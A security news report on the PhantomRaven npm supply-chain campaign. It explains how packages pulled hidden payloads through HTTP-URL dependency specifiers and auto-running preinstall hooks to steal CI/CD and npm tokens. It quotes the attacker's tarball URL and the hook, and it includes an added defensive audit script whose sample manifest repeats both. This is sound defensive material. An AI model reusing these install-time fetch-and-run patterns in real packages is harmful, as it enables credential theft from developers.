PhantomRaven Attack Involves 126 Malicious npm Packages with Over 86,000 Downloads Hiding Malicious Code

A sophisticated malware campaign targeting developers has been operating since August 2025, deploying 126 malicious npm packages that have collectively accumulated over 86,000 downloads.

The attack, now identified as PhantomRaven, has been actively harvesting npm authentication tokens, GitHub credentials, and CI/CD pipeline secrets from developers across the globe while employing advanced detection evasion techniques that bypass most security tools.

Koi analysts identified the campaign in October 2025 when their behavioral monitoring system, Wings, flagged suspicious network activity during package installation processes.

All malicious packages were making external requests to the same suspicious domain, revealing a coordinated operation.

The investigation by Koi researchers uncovered a staggering timeline: 21 packages were initially detected and removed in August 2025, but attackers adapted their approach, successfully deploying 80 additional packages between September and October that evaded detection mechanisms entirely.

The attacker’s infrastructure demonstrates an interesting contrast between sophisticated technical execution and surprisingly careless operational security.

Sequential email accounts from free providers like [email protected] through [email protected], combined with obvious usernames such as npmhell and npmpackagejpd, all clearly trace back to a single threat actor.

Despite this operational sloppiness, the technical delivery mechanism represents a genuine innovation in supply chain attacks.

The malicious packages appeared completely benign when reviewed on npmjs.com, displaying simple hello world scripts with seemingly zero dependencies.

The npm UI shows 0 dependencies (Source – Koi)

This illusion was achieved through a technique involving Remote Dynamic Dependencies, where HTTP URLs serve as dependency specifiers rather than traditional npm registry references.

The malicious code resided not in the reviewed package but in an invisible dependency fetched from packages.storeartifact.com at installation time, completely bypassing static analysis and dependency scanning tools.

Remote Dynamic Dependencies Deliver the Payload

Traditional npm dependencies reference packages hosted on npmjs.com using standard version specifiers like "express": "^4.18.0".

However, npm also accepts a little-used form of specifier in which an HTTP URL points directly at a tarball, for example "ui-styles-pkg": "http://packages.storeartifact.com/ui-styles-pkg.tgz".

When developers install packages containing these remote dependencies, npm automatically fetches the external resources without any security validation or visibility.

Security scanners and automated analysis tools never follow these HTTP-based dependencies, treating packages as having zero dependencies despite the hidden malicious payload.

This creates a perfect blind spot where the reviewed package appears completely safe while the actual malicious code sits on attacker-controlled infrastructure.

The technique becomes even more dangerous because every installation fetches the dependency fresh from the attacker’s server, enabling dynamic payload delivery based on the target environment.

Once the invisible dependency arrives on the victim’s system, npm’s automatic lifecycle script execution ensures the malware activates immediately.

The malicious package.json contains a preinstall script defined as "preinstall": "node index[.]js" that executes automatically without any user prompt or warning.

This script runs regardless of how deeply nested the malicious package sits within the dependency tree, meaning developers who install seemingly legitimate packages can unknowingly trigger PhantomRaven’s execution through transitive dependencies.
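As an added defensive check (not code from the Koi report or from npm itself), the audit below walks a package.json and a package-lock.json and flags the two mechanisms described above: dependency specifiers that are HTTP URLs, and install-time lifecycle hooks such as preinstall. The sample manifest and lockfile are constructed; the domain and specifier shape are the ones quoted in the article.

```javascript
// Added example, not code from Koi or npm: flag the two delivery mechanisms
// described above, URL-valued dependency specifiers and install-time hooks.
const DEP_FIELDS = ['dependencies', 'devDependencies', 'optionalDependencies', 'peerDependencies'];
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// npm fetches these from the given URL instead of resolving through the registry.
function isRemoteSpecifier(spec) {
  return /^(git\+)?https?:\/\//i.test(String(spec));
}
function auditManifest(manifest) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      if (isRemoteSpecifier(spec)) findings.push({ type: 'remote-dependency', field, name, spec });
    }
  }
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ type: 'lifecycle-script', hook, command: scripts[hook] });
  }
  return findings;
}
// package-lock.json (lockfileVersion 2/3) records the URL each installed package
// was resolved from, so it also exposes remote dependencies nested deep in the tree.
function auditLockfile(lock, allowedRegistries = ['https://registry.npmjs.org/']) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '' || !entry.resolved) continue; // root project or workspace link
    if (!allowedRegistries.some((r) => entry.resolved.startsWith(r))) {
      findings.push({ type: 'off-registry-resolution', path, resolved: entry.resolved });
    }
  }
  return findings;
}
// Constructed sample inputs; the specifier and hook mirror the shapes quoted above.
const SAMPLE_MANIFEST = {
  name: 'demo-app', version: '1.0.0',
  dependencies: { express: '^4.18.0', 'ui-styles-pkg': 'http://packages.storeartifact.com/ui-styles-pkg.tgz' },
  scripts: { preinstall: 'node index.js', test: 'jest' },
};
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/express': { version: '4.18.2', resolved: 'https://registry.npmjs.org/express/-/express-4.18.2.tgz' },
    'node_modules/ui-styles-pkg': { version: '1.0.0', resolved: 'http://packages.storeartifact.com/ui-styles-pkg.tgz' },
  },
};
console.log(auditManifest(SAMPLE_MANIFEST), auditLockfile(SAMPLE_LOCK));
```

Running `npm install --ignore-scripts` stops the preinstall hook from executing but still downloads the remote tarball, so the lockfile check is worth running in CI as well.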

After successful installation, PhantomRaven systematically harvests email addresses from environment variables, .gitconfig files, .npmrc configurations, and package.json author fields.

The malware then targets CI/CD credentials including GitHub Actions tokens, GitLab CI credentials, Jenkins authentication, CircleCI tokens, and npm publishing tokens.

Complete system fingerprinting follows, collecting public IP addresses, hostnames, operating system details, Node.js versions, and network configurations to profile victim environments and identify high-value corporate networks versus individual developer machines.
